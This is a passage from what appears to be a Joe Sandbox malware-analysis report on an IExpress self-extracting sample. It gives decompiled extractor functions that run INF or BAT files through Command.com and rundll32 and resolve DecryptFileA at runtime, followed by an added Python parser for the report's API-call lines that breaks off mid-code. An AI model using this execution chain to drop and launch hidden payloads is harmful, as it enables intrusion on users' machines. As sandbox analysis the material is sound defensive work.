                                                                                                                                                                                                    0x00393ed5
                                                                                                                                                                                                    0x00393ed9
                                                                                                                                                                                                    0x00393ee0
                                                                                                                                                                                                    0x00393ee6
                                                                                                                                                                                                    0x00393eea
                                                                                                                                                                                                    0x00393eec
                                                                                                                                                                                                    0x00393eee
                                                                                                                                                                                                    0x00393ef3
                                                                                                                                                                                                    0x00393ef3
                                                                                                                                                                                                    0x00393ef5
                                                                                                                                                                                                    0x00393efa
                                                                                                                                                                                                    0x00393efb
                                                                                                                                                                                                    0x00393efd
                                                                                                                                                                                                    0x00393f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393eff
                                                                                                                                                                                                    0x00393eff
                                                                                                                                                                                                    0x00393f05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393f05
                                                                                                                                                                                                    0x00393efd
                                                                                                                                                                                                    0x00393dc7
                                                                                                                                                                                                    0x00393dce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393dd0
                                                                                                                                                                                                    0x00393dd7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393dd9
                                                                                                                                                                                                    0x00393ddb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393ddd
                                                                                                                                                                                                    0x00393de1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393de1
                                                                                                                                                                                                    0x00393d59

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00393C11
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00393CDC
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00398C42), ref: 00393D8F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00393E26
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00398C42), ref: 00393EFF
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00398C42), ref: 00393F1F
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00398C42), ref: 00393F40
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00398C42), ref: 00393F47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00398C42), ref: 00393F76
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00398C42), ref: 00393F80
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00398C42), ref: 00393FC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
                                                                                                                                                                                                    • API String ID: 1032054927-335935182
                                                                                                                                                                                                    • Opcode ID: 61630cebbcd5f4a7250dd96d39cd71966205b00554864781fd397714804bffe6
                                                                                                                                                                                                    • Instruction ID: 2698218955381ff7013a8b77c4d6b1235f11bda55810f408ee4c5e45a856ac3e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61630cebbcd5f4a7250dd96d39cd71966205b00554864781fd397714804bffe6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B1E4B09083019BDF23DF248849B6B77E8EB85750F11092EFA96D62D0DB71CD45CB96
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph of function 391ae8 (basic blocks and edges rendered as an image in the original report; legend: Executed / Not Executed). Blocks referencing API calls include CompareStringA, GetFileAttributesA, LocalAlloc, GetPrivateProfileIntA, GetPrivateProfileStringA and GetShortPathNameA.]
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00391AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v527;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				char _v1552;
                                                                                                                                                                                                    				CHAR* _v1556;
                                                                                                                                                                                                    				int* _v1560;
                                                                                                                                                                                                    				CHAR** _v1564;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                    				CHAR* _t53;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				signed char _t65;
                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                                                    				CHAR* _t90;
                                                                                                                                                                                                    				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x398004; // 0x74c05eb4
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00391680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00391A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00391781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					E0039658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00391680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E003966C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E003966C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00391680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00391781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E003916B3( &_v1552, 0x400, " ");
										E003916B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00392AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0039171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00391A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00391A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E003944B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x399120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x391140, _t156, 8,  &_v268) == 0) {
										 *0x399a34 =  *0x399a34 & 0xfffffffb;
										if( *0x399a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
                                                                                                                                                                                                    											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_push( &_v268);
                                                                                                                                                                                                    										_push(_t155);
                                                                                                                                                                                                    										E0039171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *0x399a34 =  *0x399a34 | 0x00000004;
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										E00391680(_t108, 0x104, _t155);
                                                                                                                                                                                                    										_t140 = 0x200;
                                                                                                                                                                                                    										E00391680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                    									return E00396CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00391ddc
                                                                                                                                                                                                    0x00391dde
                                                                                                                                                                                                    0x00391d64
                                                                                                                                                                                                    0x00391d64
                                                                                                                                                                                                    0x00391d67
                                                                                                                                                                                                    0x00391d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391c67
                                                                                                                                                                                                    0x00391c67
                                                                                                                                                                                                    0x00391c6d
                                                                                                                                                                                                    0x00391c72
                                                                                                                                                                                                    0x00391c74
                                                                                                                                                                                                    0x00391c74
                                                                                                                                                                                                    0x00391c8e
                                                                                                                                                                                                    0x00391c99
                                                                                                                                                                                                    0x00391cc0
                                                                                                                                                                                                    0x00391cf8
                                                                                                                                                                                                    0x00391d07
                                                                                                                                                                                                    0x00391d23
                                                                                                                                                                                                    0x00391d09
                                                                                                                                                                                                    0x00391d14
                                                                                                                                                                                                    0x00391d1b
                                                                                                                                                                                                    0x00391d1b
                                                                                                                                                                                                    0x00391d2b
                                                                                                                                                                                                    0x00391d2d
                                                                                                                                                                                                    0x00391d2d
                                                                                                                                                                                                    0x00391d38
                                                                                                                                                                                                    0x00391d39
                                                                                                                                                                                                    0x00391d46
                                                                                                                                                                                                    0x00391cc2
                                                                                                                                                                                                    0x00391cc2
                                                                                                                                                                                                    0x00391ccc
                                                                                                                                                                                                    0x00391cce
                                                                                                                                                                                                    0x00391cce
                                                                                                                                                                                                    0x00391cdb
                                                                                                                                                                                                    0x00391ce6
                                                                                                                                                                                                    0x00391cee
                                                                                                                                                                                                    0x00391cee
                                                                                                                                                                                                    0x00391e89
                                                                                                                                                                                                    0x00391e91
                                                                                                                                                                                                    0x00391e92
                                                                                                                                                                                                    0x00391e94
                                                                                                                                                                                                    0x00391e97
                                                                                                                                                                                                    0x00391ea4
                                                                                                                                                                                                    0x00391ea4
                                                                                                                                                                                                    0x00391c61
                                                                                                                                                                                                    0x00391c07
                                                                                                                                                                                                    0x00391bd3
                                                                                                                                                                                                    0x00391b7b

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00391BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00391BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00391C57
• GetPrivateProfileIntA.KERNEL32 ref: 00391C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00391140,00000000,00000008,?), ref: 00391CB8
• GetShortPathNameA.KERNEL32 ref: 00391D1B
  • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
  • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-2145762761
• Opcode ID: 86076646e74dc9f4edb47cc2162ac2ac6e1314a437aba2d1fc8755bf2b4db63f
• Instruction ID: 4f9e1e7795761fce32df474a7d95eb62a27ccc5b1d99c21346e8e155ea4f855a
• Opcode Fuzzy Hash: 86076646e74dc9f4edb47cc2162ac2ac6e1314a437aba2d1fc8755bf2b4db63f
• Instruction Fuzzy Hash: D7A15771A0021B6BEF239B28CC45FFA776EEB85310F140299E955B72D0DBB18E85CB50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 450 392f1d-392f3d 451 392f6c-392f73 call 395164 450->451 452 392f3f-392f46 450->452 461 392f79-392f80 call 3955a0 451->461 462 393041 451->462 454 392f48 call 3951e5 452->454 455 392f5f-392f66 call 393a3f 452->455 459 392f4d-392f4f 454->459 455->451 455->462 459->462 464 392f55-392f5d 459->464 461->462 469 392f86-392fbe GetSystemDirectoryA call 39658a LoadLibraryA 461->469 463 393043-393053 call 396ce0 462->463 464->451 464->455 472 392fc0-392fd4 GetProcAddress 469->472 473 392ff7-393004 FreeLibrary 469->473 472->473 474 392fd6-392fee DecryptFileA 472->474 475 393017-393024 SetCurrentDirectoryA 473->475 476 393006-39300c 473->476 474->473 485 392ff0-392ff5 474->485 478 393054-39305a 475->478 479 393026-39303c call 3944b9 call 396285 475->479 476->475 477 39300e call 39621e 476->477 489 393013-393015 477->489 481 39305c call 393b26 478->481 482 393065-39306c 478->482 479->462 491 393061-393063 481->491 487 39307c-393089 482->487 488 39306e-393075 call 39256d 482->488 485->473 493 39308b-393091 487->493 494 3930a1-3930a9 487->494 498 39307a 488->498 489->462 489->475 491->462 491->482 493->494 499 393093 call 393ba2 493->499 496 3930ab-3930ad 494->496 497 3930b4-3930b7 494->497 496->497 501 3930af call 394169 496->501 497->463 498->487 504 393098-39309a 499->504 501->497 504->462 505 39309c 504->505 505->494
C-Code - Quality: 82%
			E00392F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x398004; // 0x74c05eb4
				_v8 = _t9 ^ _t46;
				if( *0x398a38 != 0) {
					L5:
					_t11 = E00395164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00396CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E003955A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0039658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                    								 *0x39a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                    						_t58 =  *0x398a24 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                    								__eflags =  *0x398a2c - _t44; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									__eflags =  *0x398d48 & 0x000000c0;
                                                                                                                                                                                                    									if(( *0x398d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                    										_t41 =  *0x399a40; // 0x3, executed
                                                                                                                                                                                                    										_t26 = E0039256D(_t41); // executed
                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t22 =  *0x398a24; // 0x0
                                                                                                                                                                                                    									 *0x399a44 = _t44;
                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                    										__eflags =  *0x398a38;
                                                                                                                                                                                                    										if( *0x398a38 == 0) {
                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												E00394169(__eflags);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags =  *0x399a30 - _t22; // 0x0
                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t25 = E00393BA2(); // executed
                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t22 =  *0x398a24; // 0x0
                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t27 = E00393B26(_t40, _t44);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t43 = 0x4bc;
                                                                                                                                                                                                    							E003944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                    							 *0x399124 = E00396285();
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t59 =  *0x399a30 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E0039621E(); // executed
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t49 =  *0x398a24;
                                                                                                                                                                                                    				if( *0x398a24 != 0) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					_t34 = E00393A3F(_t51);
                                                                                                                                                                                                    					_t52 = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E003951E5(_t49) == 0) {
                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t51 =  *0x398a38;
                                                                                                                                                                                                    				if( *0x398a38 != 0) {
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x0039307c
                                                                                                                                                                                                    0x00393081
                                                                                                                                                                                                    0x00393087
                                                                                                                                                                                                    0x00393089
                                                                                                                                                                                                    0x003930a1
                                                                                                                                                                                                    0x003930a1
                                                                                                                                                                                                    0x003930a9
                                                                                                                                                                                                    0x003930ab
                                                                                                                                                                                                    0x003930ad
                                                                                                                                                                                                    0x003930af
                                                                                                                                                                                                    0x003930af
                                                                                                                                                                                                    0x003930ad
                                                                                                                                                                                                    0x003930b6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039308b
                                                                                                                                                                                                    0x0039308b
                                                                                                                                                                                                    0x00393091
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393093
                                                                                                                                                                                                    0x00393098
                                                                                                                                                                                                    0x0039309a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039309c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039309c
                                                                                                                                                                                                    0x00393089
                                                                                                                                                                                                    0x0039305c
                                                                                                                                                                                                    0x00393061
                                                                                                                                                                                                    0x00393063
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393063
                                                                                                                                                                                                    0x0039302b
                                                                                                                                                                                                    0x00393032
                                                                                                                                                                                                    0x0039303c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039303c
                                                                                                                                                                                                    0x00393006
                                                                                                                                                                                                    0x0039300c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039300e
                                                                                                                                                                                                    0x00393015
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393015
                                                                                                                                                                                                    0x00392f80
                                                                                                                                                                                                    0x00392f3f
                                                                                                                                                                                                    0x00392f46
                                                                                                                                                                                                    0x00392f5f
                                                                                                                                                                                                    0x00392f5f
                                                                                                                                                                                                    0x00392f64
                                                                                                                                                                                                    0x00392f66
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392f66
                                                                                                                                                                                                    0x00392f4f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00392f55
                                                                                                                                                                                                    0x00392f5d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

APIs
• GetSystemDirectoryA.KERNEL32 ref: 00392F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00392FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00392FC6
• DecryptFileA.ADVAPI32 ref: 00392FE6
• FreeLibrary.KERNEL32(00000000), ref: 00392FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039301C
  • Part of subcall function 003951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00392F4D,?,00000002,00000000), ref: 00395201
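The API list above records the classic runtime-resolution chain in one function: the library path is built with GetSystemDirectoryA, advapi32.dll is mapped with LoadLibraryA, the export DecryptFileA is looked up with GetProcAddress, called, and the module released with FreeLibrary; the same function then changes into the IXP001.TMP folder under the user's Temp directory, which is the extraction-folder naming scheme wextract.exe (IExpress self-extracting packages) uses. The Python below is an added example, not part of the Joe Sandbox report or of its signature engine: it parses API-call lines in the format shown in this block (the sample lines are copied from it), pairs each GetProcAddress with the preceding LoadLibrary* and the later direct call of the resolved name, and reports IXPnnn.TMP paths found in arguments. The line grammar, the pairing heuristic (nearest preceding LoadLibrary* in the same function, first later call with the resolved name) and the IXP path rule are this example's assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the API-call lines of the function listing above, copied verbatim.
SAMPLE_LISTING = r"""
• GetSystemDirectoryA.KERNEL32 ref: 00392F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00392FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00392FC6
• DecryptFileA.ADVAPI32 ref: 00392FE6
• FreeLibrary.KERNEL32(00000000), ref: 00392FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039301C
  • Part of subcall function 003951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00392F4D,?,00000002,00000000), ref: 00395201
"""

# Assumed line grammar: "• [Part of subcall function XXXX: ]Name.MODULE[(args)], ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*"
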